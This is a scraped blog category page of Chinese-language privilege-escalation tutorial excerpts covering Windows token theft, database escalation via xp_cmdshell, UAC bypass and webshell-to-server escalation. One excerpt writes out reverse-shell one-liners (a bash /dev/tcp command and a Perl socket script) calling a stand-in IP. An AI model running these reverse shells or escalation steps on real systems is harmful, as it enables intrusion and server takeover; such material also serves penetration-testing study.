![](https://img-blog.csdnimg.cn/20201014180756754.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
权限提升
文章平均质量分 71
权限提升
W小哥1
微信公众号:W小哥
展开
-
windows权限提升——烂土豆+dll劫持+引号路径&+服务权限
一、win2012—烂土豆配合令牌窃取提权—web权限1.1 RottenPotato(烂土豆)提权的原理1.欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。2.对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通过一系列的Windows API调用实现的。3.模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户(IIS、MSSQL等)有这个原创 2021-12-06 12:26:44 · 4281 阅读 · 0 评论 -
windows权限提升——windows2003进程注入提升(本地)
一、进程注入简介进程注入提权是本地提权方式的一种较为老的安全技术了,利用的是注入进程的所有者实现权限共享机制,这类技术主要利用在Windows2008之前操作系统上。所以我们需要学习后续的本地提权更多的手法才能针对高版本的系统。版本: Windows2008之前1.1 提权教程演示环境:windows20031、将pinjector工具上传到目标服务器,运行以下命令pinjector.exe //运行命令,查看用法pinjector.exe -l //列出可注入的进程pin原创 2021-12-03 11:28:21 · 4061 阅读 · 0 评论 -
PostgreSQL 数据库提权的几种方法——提权教程
一、漏洞描述二、漏洞原理三、环境搭建四、漏洞复现五、漏洞修复原创 2021-12-02 10:00:26 · 2972 阅读 · 0 评论 -
windows权限提升——windows2008&7 令牌窃取提升(本地)
一、令牌窃取提升介绍原理: 进行远程过程调用时请求提升权限,然后调用它从而生成特权安全令牌以执行特权操作。当系统允许令牌不仅用于进程本身,还用于原始请求进程时,漏洞就会出现。令牌窃取方式在Windows2008之后的高版本操作系统已经没用了,只能用于一些低版本系统。比如:Microsoft Windows XP Professional SP3和之前版本Windows Server 2003 SP2和之前的版本Windows Server 2003 x64和x64 SP2Windows Serv原创 2021-12-01 17:08:57 · 4325 阅读 · 0 评论 -
windows权限提升——AT、SC、PS命令提权
一、AT命令适用范围: Windows2000、Windows 2003、Windows XP1.1 AT命令简介AT命令是Windows XP中内置的命令,它也可以媲美Windows中的“计划任务”,而且在计划的安排、任务的管理、工作事务的处理方面,AT命令具有更强大更神通的功能。AT命令可在指定时间和日期、在指定计算机上运行命令和程序。因为AT命令默认是以system权限下运行的所以我们可以利用以下命令,进行提权。1.2 AT命令提权实验系统:windows2003命令:at 13:38原创 2021-11-25 14:22:46 · 5722 阅读 · 2 评论 -
SQL Server 数据库提权的几种方法——提权教程
一、简介在利用系统溢出漏洞没有效果的情况下,可以采用数据库进行提权。数据库提权的前提条件:1、服务器开启数据库服务2、获取到最高权限用户密码(除Access数据库外,其他数据库基本都存在数据库提权的可能)二、使用xp_cmdshell进行提权xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重新开启它。启用:EXEC sp_configure ‘show advanced opti原创 2021-01-20 14:54:45 · 13000 阅读 · 5 评论 -
MYSQL数据库提权的几种方法——提权教程
一、简介在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权。数据库提权的前提条件:1、服务器开启数据库服务2、获取到最高权限用户密码(除Access数据库外,其他数据库基本都存在数据库提权的可能)常见密码获取方式:1、读取网站数据库配置文件(了解其命名规则及查找技巧)例如:sql data inc config conn database common include等2、读取数据库存储或备份文件(了解其数据库存储格式及对应内容)例如:@@basedir/data/数据库名/表名.m原创 2021-01-13 17:15:34 · 13383 阅读 · 4 评论 -
Linux——Vulmap-Linux提权辅助工具简介与使用教程
一、工具简介Vulmap 是一个开源的在线本地漏洞扫描器, 它由 Windows 和 Linux 操作系统的在线本地漏洞扫描程序组成。扫描结果可用于防御和进攻。也可以被用于权限提升。Vulmap 可以用来扫描本地主机上的漏洞,查看相关漏洞并下载它们。 脚本基本上是扫描 localhost 以收集已安装的软件信息,并询问 vulmon.com网站的api 是否存在与已安装软件相关的漏洞。 如果存在漏洞,Vulmap 提供 CVE的ID、风险评分、漏洞的详细链接,如果存在相关的漏洞利用 ID 和利用标题。,原创 2021-01-06 10:32:39 · 2283 阅读 · 0 评论 -
Windows操作系统——WindowsVulnScan提权辅助工具简介与使用教程
一、工具简介说明:这是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免database is locked的错误,采用md5哈希算法确保数据不重复插入。本工具查找是否有公开exp的网站为shodan,该网站限制网络发包的速度,因而采用了单线程的方式,且耗时较长。功能:查找主机上具有的CVE查找具有公开EXP的CVE起因:因为需要做一些主机漏洞扫描方面的工作,因而编写了这个简单的工具。之前也查找了几款类似的工具,如下:vulm原创 2021-01-05 17:33:49 · 1882 阅读 · 3 评论 -
Windows操作系统——Windows-Exploit-Suggester提权辅助工具的简介与使用教程
一、工具简介Windows-Exploit-Suggester是受Linux_Exploit_Suggester的启发而开发的一款提权辅助工具,其主要功能是通过比对systeminfo生成的文件,从而发现系统是否存在未修复漏洞。该工具截止到2017年已经不更新维护了,但是还是挺好用的。二、使用教程1、安装xlrd库,安装时指定xlrd库版本为1.2.0,如下图所示。因为最近xlrd更新到了2.0.1版本,而2.0.1版本只支持.xls文件,运行时会报错2、更新获取漏洞库详细信息 py -2 wind原创 2021-01-05 16:00:16 · 1229 阅读 · 0 评论 -
Cookie注入漏洞 + 数据库备份getshell——漏洞复现
一、环境搭建网站源码在我的资源中,是:南方数据企业网站管理系统,下载后,使用iis平台搭建二、漏洞复现假设我们通过网站的sql注入漏洞,注入出用户名admin、密码admin123,登录网站后台如下图所示:...原创 2021-01-05 11:03:24 · 1690 阅读 · 0 评论 -
N种反弹shell方法汇总
bash:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1Perl 1:perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton(...原创 2020-03-09 14:21:21 · 447 阅读 · 0 评论 -
基于Linux操作系统的几种反弹Shell方法的总结
什么是反弹shell所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上为什么要反弹shell?通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正...原创 2020-03-09 14:06:50 · 965 阅读 · 3 评论 -
突破UAC提权
一、什么是UAC用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果。二、实例比如打开电脑的ensp软件电脑弹窗显示...原创 2020-11-19 10:31:45 · 243 阅读 · 2 评论 -
通过web提权提升至服务器权限(利用网站数据库)整个过程记录
目标IP:192.168.106.130攻击IP:192.168.106.1前提:假设我们已经成功上传php一句话木马第一步:访问php一句话木马,中国菜刀连接木马第二步:查看目标网站开放的端口号右键进入虚拟终端发现目标网站开放了3306端口,确定数据库类型是MySQL第三步:通过查看网站数据库配置文件或数据库目录文件获取root密码1、网站数据库配置文件命名规则:sql、...原创 2020-11-19 10:32:06 · 1827 阅读 · 0 评论 -
通过web提权提升至服务器权限(ASP网站,利用系统溢出漏洞)整个过程记录
目标IP:192.168.106.130:82攻击IP:192.168.106.1原理:利用系统溢出漏洞提升第一步:访问目标网站第二步:假设已经成功将大马文件上传至目标网站,访问大马输入后门密码,登录第三步:执行系统命令ipconfig,如图所示执行后显示拒绝访问,如图所示用执行–CMD2测试结果,如图所示第三步:不能执行cmd命令,我们就自己上传首先查看一下目录权...原创 2020-03-14 16:00:39 · 1094 阅读 · 0 评论 -
MYSQL突破secure_file_priv写shell
目标IP地址:192.168.106.130本地IP地址:192.168.106.1访问目标网络如下图所示:实验场景:某些情况下,当我们进入网站phpmyadmin或者网站后台执行SQL命令,计划通过select into outfile写一句话木马(shell),但是通常都会报错,如下图所示:原因:在mysql 中 secure_file_priv的值默认为NULL。并且无法用s...原创 2020-11-19 10:31:36 · 1433 阅读 · 0 评论